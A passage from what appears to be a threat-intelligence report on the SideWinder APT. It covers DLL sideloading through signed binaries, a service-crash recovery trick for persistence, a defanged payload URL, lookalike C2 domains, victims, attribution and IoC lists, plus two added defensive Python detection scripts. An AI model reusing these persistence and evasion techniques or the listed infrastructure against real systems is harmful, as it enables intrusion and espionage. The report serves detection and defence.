If the Windows build number is lower than 10240 (the first Windows 10 release), the malware installs the following files:

  • %systemroot%\srclinks\write.exe
  • %systemroot%\srclinks\propsys.dll
  • %systemroot%\srclinks\write.exe.config
  • %systemroot%\srclinks\vm3dservice.exe
  • %systemroot%\srclinks\winmm.dll

Otherwise:

  • %systemroot%\srclinks\fsquirt.exe
  • %systemroot%\srclinks\devobj.dll
  • %systemroot%\srclinks\fsquirt.exe.config
  • %systemroot%\srclinks\vm3dservice.exe
  • %systemroot%\srclinks\winmm.dll

The malware also creates a new Windows service named "srclink" to ensure that the downloaded files start automatically when the system restarts. The service is configured to start automatically and run the following program:
C:\WINDOWS\srclinks\vm3dservice.exe
The file is a legitimate program digitally signed by VMware and is used by the attacker to sideload the malicious "winmm.dll" library. This is a library developed in C++ and named "SyncBotServiceHijack.dll" that exports all the functions normally exported by the legitimate "winmm.dll" located in the system32 directory. All the exports point to a single function that sleeps for 10 seconds, then raises a signal error and terminates the process.

Instructions used to raise an error

This is part of the persistence mechanism created by the attacker. The malicious Windows service created by the InstallerPayload component is configured to launch another program if the service fails.

Windows service properties

We presume the attacker uses this trick to evade detection and sandbox technologies: the service binary that is executed is a signed VMware file that simply crashes, and the malicious loader is only started by the Service Control Manager's recovery action, so a sandbox or an analyst watching the service start alone sees nothing suspicious.

In this case, the service starts another program previously dropped by the malware:
%systemroot%\srclinks\fsquirt.exe
This is a legitimate Windows utility that provides the default GUI for the Bluetooth File Transfer Wizard. The attacker uses it to sideload another malicious library, "devobj.dll", which is a variant of the Backdoor loader module.

InstallerPayload_NET


This is another .NET library, which performs similar actions to the previously described InstallerPayload developed in C++. The main difference is that this malware embeds most of the files as resources.

Library | Hash (MD5) | Description
devobjLoadAppDllx32 | a7aad43a572f44f8c008b9885cf936cf | "Backdoor loader module" dropped as devobj.dll
fsquirt | ba54013cad72cd79d2b7843602835ed3 | Legitimate program signed by Microsoft
Manage | f840c721e533c05d152d2bc7bf1bc165 | Program used to hijack the Windows service
manifest | d3136d7151f60ec41a370f4743c2983b | XML manifest
propsysLoadAppDllx32 | 56e7d6b5c61306096a5ba22ebbfb454e | "Backdoor loader module" dropped as propsys.dll

Similar to InstallerPayload, the malware creates a new service that launches Manage.exe, a simple program that sleeps for 20 seconds and then generates an exception. The service is configured to launch another program in case of failure. The second program, "fsquirt.exe" or "write.exe", is a legitimate application used to sideload a malicious library, the Backdoor loader module component.
The encrypted file to be loaded by the Backdoor loader module component is downloaded from a remote server using a URL embedded in the code:
hxxps://split.tyoin[.]biz/7n6at/g3mnr/1691394613799/f0f9e572
The received data are stored in a file with a random name and no extension.
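The drop locations of the UAC bypass module (copies of rundll32.exe/rdpclip.exe under %localappdata%\Microsoft) and the installers' persistence (the %systemroot%\srclinks directory, the "srclink" service and its "run a program" recovery action that launches the second sideload host) are all cheap to hunt for. The script below is an added example and not code from the article or the malware: it turns those observations into rules, runs them over a host snapshot, and includes a Windows-only collector that reads ImagePath and FailureCommand (the registry value the Service Control Manager stores for a "run a program" recovery action) for every service. The snapshot format, rule texts, function names and the sample snapshot are this example's own; paths, DLL names and the service name come from the text above.

```python
"""Host triage for the UAC bypass and installer artifacts (added example)."""
import os
import re
import sys

# Directories a service binary or a system DLL is expected to run from; one of
# the names below anywhere else is worth a look (heuristic, not from the article).
TRUSTED = re.compile(r"^[a-z]:\\(windows\\(system32|syswow64)|program files( \(x86\))?)\\")
# Signed binaries the malware copies/drops next to a DLL it wants sideloaded.
ABUSED_BINARIES = {"rundll32.exe", "rdpclip.exe", "fsquirt.exe", "write.exe", "vm3dservice.exe"}
# DLL names the payloads are dropped under (Module/Backdoor loader/SyncBotServiceHijack).
SIDELOAD_DLLS = {"devobj.dll", "propsys.dll", "winmm.dll"}


def _norm(path):
    """Lower-case, backslash-only path so the rules work on any saved snapshot."""
    return path.strip().strip('"').lower().replace("/", "\\")


def _image_exe(image_path):
    """Executable part of a service ImagePath or recovery command, with or without quotes."""
    p = image_path.strip()
    if p.startswith('"'):
        p = p[1:].split('"', 1)[0]
    else:
        m = re.match(r"(.+?\.exe)(\s|$)", p, re.IGNORECASE)
        p = m.group(1) if m else p
    return _norm(p)


def check_file(path):
    """One finding string for a suspicious file path, or None."""
    p = _norm(path)
    name = p.rsplit("\\", 1)[-1]
    if name in ABUSED_BINARIES and not TRUSTED.match(p):
        return f"signed system/VMware binary copied outside trusted dirs (sideload host): {path}"
    if name in SIDELOAD_DLLS and not TRUSTED.match(p):
        return f"sideload DLL candidate outside trusted dirs: {path}"
    if "\\srclinks\\" in p:
        return f"file in the installers' drop directory: {path}"
    return None


def check_service(svc):
    """Findings for a record {name, image_path, failure_command (optional)}."""
    findings = []
    if svc.get("name", "").lower() == "srclink":
        findings.append("service name 'srclink' matches the installers' persistence service")
    exe = _image_exe(svc.get("image_path", ""))
    if exe and not TRUSTED.match(exe):
        findings.append(f"service binary outside trusted dirs: {exe}")
    cmd = svc.get("failure_command")
    if cmd:
        # Rare for legitimate services. Here it is the whole trick: the signed
        # vm3dservice.exe crashes on purpose (winmm.dll) and the SCM itself
        # launches the second sideload host (fsquirt.exe / write.exe).
        fexe = _image_exe(cmd)
        where = "" if TRUSTED.match(fexe) else " (outside trusted dirs)"
        findings.append(f"recovery action runs a program: {fexe}{where}")
    return findings


def triage(snapshot):
    """All findings for {'files': [...], 'services': [{...}, ...]}."""
    out = [f for f in map(check_file, snapshot.get("files", [])) if f]
    for svc in snapshot.get("services", []):
        out += [f"[{svc.get('name')}] {f}" for f in check_service(svc)]
    return out


def collect_snapshot():
    """Windows-only: list the two drop directories and read every service's
    ImagePath / FailureCommand from the registry."""
    if sys.platform != "win32":
        raise RuntimeError("collect_snapshot() needs Windows; run triage() on a saved snapshot instead")
    import winreg
    files = []
    for d in (os.path.expandvars(r"%SYSTEMROOT%\srclinks"), os.path.expandvars(r"%LOCALAPPDATA%\Microsoft")):
        if os.path.isdir(d):
            files += [e.path for e in os.scandir(d) if e.is_file()]
    services = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services") as root:
        for i in range(winreg.QueryInfoKey(root)[0]):
            name = winreg.EnumKey(root, i)
            rec = {"name": name}
            try:
                with winreg.OpenKey(root, name) as k:
                    for value, field in (("ImagePath", "image_path"), ("FailureCommand", "failure_command")):
                        try:
                            rec[field] = winreg.QueryValueEx(k, value)[0]
                        except OSError:
                            pass
            except OSError:
                pass
            services.append(rec)
    return {"files": files, "services": services}


# Constructed snapshot modelled on the article's description (not real telemetry).
SAMPLE_SNAPSHOT = {
    "files": [
        r"C:\Users\alice\AppData\Local\Microsoft\rdpclip.exe",
        r"C:\Users\alice\AppData\Local\Microsoft\devobj.dll",
        r"C:\Windows\srclinks\vm3dservice.exe",
        r"C:\Windows\srclinks\winmm.dll",
        r"C:\Windows\System32\winmm.dll",  # the genuine one; must not fire
    ],
    "services": [
        {"name": "srclink", "image_path": r"C:\WINDOWS\srclinks\vm3dservice.exe",
         "failure_command": r"C:\WINDOWS\srclinks\fsquirt.exe"},
        {"name": "Dhcp", "image_path": r"C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted"},
    ],
}

if __name__ == "__main__":
    for line in triage(SAMPLE_SNAPSHOT):
        print(line)
```

On a live host, `triage(collect_snapshot())` gives the same output for real data; `sc.exe qfailure srclink` shows the same recovery action interactively. The FailureCommand rule is the generalisable part: a service whose failure action launches a program is unusual enough to review regardless of the names involved.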

Infrastructure


The attacker registered numerous domains using Hostinger, Namecheap, and Hosting Concepts as providers. The malware is typically configured to communicate with FQDNs whose subdomain labels imitate legitimate domain names, probably chosen for relevance to the target. The following is a small subset of the subdomains used by the attacker.

Malicious domain or subdomain | Country | Legitimate domain | Legitimate owner
nextgen[.]paknavy-govpk[.]net | Pakistan | www.paknavy.gov.pk | Pakistan Navy
premier[.]moittpk[.]org | Pakistan | moitt.gov.pk | Ministry of Information Technology and Telecommunication of Pakistan
cabinet-division-pk[.]fia-gov[.]com | Pakistan | cabinet.gov.pk | Cabinet Division of Pakistan
navy-lk[.]direct888[.]net, srilanka-navy[.]lforvk[.]com | Sri Lanka | navy.lk | Sri Lanka Navy
portdjibouti[.]pmd-office[.]org | Djibouti | portdedjibouti.com | Port of Djibouti
portdedjibouti[.]shipping-policy[.]info | Djibouti | portdedjibouti.com | Port of Djibouti
mofa-gov-sa[.]direct888[.]net | Saudi Arabia | mofa.gov.sa | Ministry of Foreign Affairs, Kingdom of Saudi Arabia
mod-gov-bd[.]direct888[.]net | Bangladesh | mod.gov.bd | Ministry of Defence, Bangladesh
mmcert-org-mm[.]donwloaded[.]com | Myanmar | mmcert.org.mm | Myanmar CERT
opmcm-gov-np[.]fia-gov[.]net | Nepal | opmcm.gov.np | Office of the Prime Minister & Council of Ministers of Nepal

Each domain and its related subdomains resolve to a dedicated IP address. The C2s are hosted on VPSs used exclusively by the attacker and rented from different providers for very short periods. The attacker uses various service providers, with a preference for HZ Hosting, BlueVPS, and GhostNET.
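The naming scheme in the table is regular enough to hunt for in DNS or proxy logs: one label is a hyphenated copy of a real institutional domain (mofa-gov-sa imitates mofa.gov.sa, paknavy-govpk imitates paknavy.gov.pk), served from an unrelated registered domain. The script below is an added example, not code from the article: it reconstructs the imitated domain from such labels and reports the attacker-controlled registered domain behind each hit. The keyword set, the glued "govXX" rule and the function names are this example's heuristics, not the attacker's tooling; by design they miss labels without an institutional token (navy-lk, srilanka-navy, cabinet-division-pk in the table) and can misfire on innocent hyphenated names, so the output is a review queue, not a verdict.

```python
"""Lookalike-subdomain hunting for the naming scheme described above (added example)."""
import re

# Tokens that mark an institutional second-level domain (heuristic; extend per region).
INSTITUTIONAL = {"gov", "govt", "mil", "org", "edu", "ac"}
# 'govpk'-style tokens: an institutional word glued to a two-letter country code.
GLUED_CC = re.compile(r"^(gov|mil|edu|org)([a-z]{2})$")


def expand_label(label):
    """'mofa-gov-sa' -> 'mofa.gov.sa', 'paknavy-govpk' -> 'paknavy.gov.pk';
    None when the label does not look like an imitated institutional domain.
    The institutional token must not come first, so labels such as
    'gov-updates' or 'edu-portal' are left alone."""
    tokens = label.lower().split("-")
    if len(tokens) < 2:
        return None
    out, hit = [], False
    for i, t in enumerate(tokens):
        m = GLUED_CC.match(t)
        if m:
            out += [m.group(1), m.group(2)]
            hit = hit or i > 0
        else:
            out.append(t)
            hit = hit or (i > 0 and t in INSTITUTIONAL)
    return ".".join(out) if hit else None


def registered_domain(fqdn):
    """Registrable domain assuming a single-label public suffix, which covers the
    .net/.com/.org/.info/.live domains in the article. Use a public suffix list
    for ccTLD second levels such as .co.uk or .gov.pk."""
    parts = fqdn.lower().strip(".").split(".")
    return ".".join(parts[-2:])


def find_lookalikes(hostnames):
    """(hostname, imitated_domain, attacker_domain) for every suspicious name.
    Accepts defanged input written with '[.]'."""
    results = []
    for raw in hostnames:
        host = raw.replace("[.]", ".").lower().strip(".")
        reg = registered_domain(host)
        # Check every label left of the TLD: the imitation may sit in a subdomain
        # (mofa-gov-sa.direct888.net) or in the registered name itself
        # (nextgen.paknavy-govpk.net).
        for label in host.split(".")[:-1]:
            imitated = expand_label(label)
            if imitated and imitated != reg and not host.endswith("." + imitated):
                results.append((host, imitated, reg))
                break
    return results


# Constructed input: subdomains from the article's table plus benign names.
SAMPLE_HOSTS = [
    "nextgen.paknavy-govpk[.]net",
    "mofa-gov-sa.direct888[.]net",
    "mod-gov-bd.direct888[.]net",
    "mmcert-org-mm.donwloaded[.]com",
    "opmcm-gov-np.fia-gov[.]net",
    "srilanka-navy.lforvk[.]com",  # missed on purpose: no institutional token
    "www.mofa.gov.sa",              # benign
    "mail.mod.gov.bd",              # benign
]

if __name__ == "__main__":
    for host, imitated, reg in find_lookalikes(SAMPLE_HOSTS):
        print(f"{host:40} imitates {imitated:20} served by {reg}")
```

Feed it the unique hostnames from a day of DNS logs and pivot on the `attacker_domain` column: several imitated institutions sharing one registered domain (direct888[.]net in the table serves Sri Lanka, Saudi Arabia and Bangladesh lookalikes) is a far stronger signal than any single hostname.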

Victims


SideWinder targeted entities in various countries: Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey and the United Arab Emirates.

Targeted sectors include government and military entities, logistics, infrastructure and telecommunications companies, financial institutions, universities and oil trading companies. The attacker also targeted diplomatic entities in the following countries: Afghanistan, France, China, India, Indonesia and Morocco.

Attribution


We attribute these activities to the SideWinder APT group with medium/high confidence. The infection chain observed in these attacks is consistent with those observed in the past. Specifically, the following techniques are similar to previous SideWinder activity:

  • The use of remote template injection, which is abused to download RTF files named “file.rtf” and forged to exploit CVE-2017-11882.
  • The naming scheme used for the malicious subdomains, which attempts to resemble legitimate domains that are of significance to the targets.
  • The .NET Downloader component and the Backdoor loader module are similar to those described in the past.
  • Last but not least, most of the entities targeted by the group are similar to those targeted by SideWinder in the past.

***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

IOCs

Malicious documents


6cf6d55a3968e2176db2bba2134bbe94
c87eb71ff038df7b517644fa5c097eac
8202209354ece5c53648c52bdbd064f0
5cc784afb69c153ab325266e8a7afaf4
3a6916192106ae3ac7e55bd357bc5eee
54aadadcf77dec53b2566fe61b034384
8f83d19c2efc062e8983bce83062c9b6
8e8b61e5fb6f6792f2bee0ec947f1989
86eeb037f5669bff655de1e08199a554
1c36177ac4423129e301c5a40247f180
873079cd3e635adb609c38af71bad702
423e150d91edc568546f0d2f064a8bf1
4a5e818178f9b2dc48839a5dbe0e3cc1

Rtf


26aa30505d8358ebeb5ee15aecb1cbb0
3233db78e37302b47436b550a21cdaf9
8d7c43913eba26f96cd656966c1e26d5
d0d1fba6bb7be933889ace0d6955a1d7
e706fc65f433e54538a3dbb1c359d75f

Lnk


412b6ac53aeadb08449e41dccffb1abe දින සංශෝධන කර ගැනිම .lnk
2f4ba98dcd45e59fca488f436ab13501 Special Envoy Speech at NCA.jpg .lnk

Backdoor Loader


propsys.dll
b69867ee5b9581687cef96e873b775ff
c3ce4094b3411060928143f63701aa2e
e1bdfa55227d37a71cdc248dc9512296
ea4b3f023bac3ad1a982cace9a6eafc3
44dbdd87b60c20b22d2a7926ad2d7bea
7e97cbf25eef7fc79828c033049822af
vsstrace.dll
101a63ecdd8c68434c665bf2b1d3ffc7
d885df399fc9f6c80e2df0c290414c2f
92dd91a5e3dfb6260e13c8033b729e03
515d2d6f91ba4b76847301855dfc0e83
3ede84d84c02aa7483eb734776a20dea
2011658436a7b04935c06f59a5db7161

StealerBot


3a036a1846bfeceb615101b10c7c910e Orchestrator
47f51c7f31ab4a0d91a0f4c07b2f99d7 Keylogger
f3058ac120a2ae7807f36899e27784ea Screenshot grabber
0fbb71525d65f0196a9bfbffea285b18 File stealer
1ed7ad166567c46f71dc703e55d31c7a Live Console
2f0e150e3d6dbb1624c727d1a641e754 RDP Credential Stealer
bf16760ee49742225fdb2a73c1bd83c7 RDP Credential Stealer – Injected library
mscorlib.dll
b3650a88a50108873fc45ad3c249671a Token Grabber
4c40fcb2a12f171533fc070464db96d1 Credential Phisher – Injected library
eef9c0a9e364b4516a83a92592ffc831 UACBypass

SyncBotServiceHijack.dll


1be93704870afd0b22a4475014f199c3

Service Hijack


f840c721e533c05d152d2bc7bf1bc165 Manage.exe

Backdoor Loader devobj.dll


5718c0d69939284ce4f6e0ce580958df

Domains and IPs


126-com[.]live
163inc[.]com
afmat[.]tech
alit[.]live
aliyum[.]tech
aliyumm[.]tech
asyn[.]info
ausibedu[.]org
bol-south[.]org
cnsa-gov[.]org
colot[.]info
comptes[.]tech
condet[.]org
conft[.]live
dafpak[.]org
decoty[.]tech
defenec[.]net
defpak[.]org
detru[.]info
dgps-govpk[.]co
dgps-govpk[.]com
dinfed[.]co
dirctt88[.]co
dirctt88[.]net
direct888[.]net
direct88[.]co
directt888[.]com
donwload-file[.]com
donwloaded[.]com
donwloaded[.]net
dowmload[.]net
downld[.]net
download-file[.]net
downloadabledocx[.]com
dynat[.]tech
dytt88[.]org
e1ix[.]mov
e1x[.]tech
fia-gov[.]com
fia-gov[.]net
gov-govpk[.]info
govpk[.]info
govpk[.]net
grouit[.]tech
gtrec[.]info
healththebest[.]com
jmicc[.]xyz
kernet[.]info
kretic[.]info
lforvk[.]com
mfa-gov[.]info
mfa-gov[.]net
mfa-govt[.]net
mfacom[.]org
mfagov[.]org
mfas[.]pro
mitlec[.]site
mod-gov-pk[.]live
mofa[.]email
mofagovs[.]org
moittpk[.]net
moittpk[.]org
mshealthcheck[.]live
nactagovpk[.]org
navy-mil[.]co
newmofa[.]com
newoutlook[.]live
nopler[.]live
ntcpak[.]live
ntcpak[.]org
ntcpk[.]info
ntcpk[.]net
numpy[.]info
numzy[.]net
nventic[.]info
office-drive[.]live
pafgovt[.]com
paknavy-gov[.]org
paknavy-govpk[.]info
paknavy-govpk[.]net
pdfrdr-update[.]com
pdfrdr-update[.]info
pmd-office[.]com
pmd-office[.]live
pmd-office[.]org
ptcl-net[.]com
scrabt[.]tech
shipping-policy[.]info
sjfu-edu[.]co
support-update[.]info
tazze[.]co
tex-ideas[.]info
tni-mil[.]com
tsinghua-edu[.]tech
tumet[.]info
u1x[.]co
ujsen[.]net
update-govpk[.]co
updtesession[.]online
widge[.]info


securelist.com/sidewinder-apt/…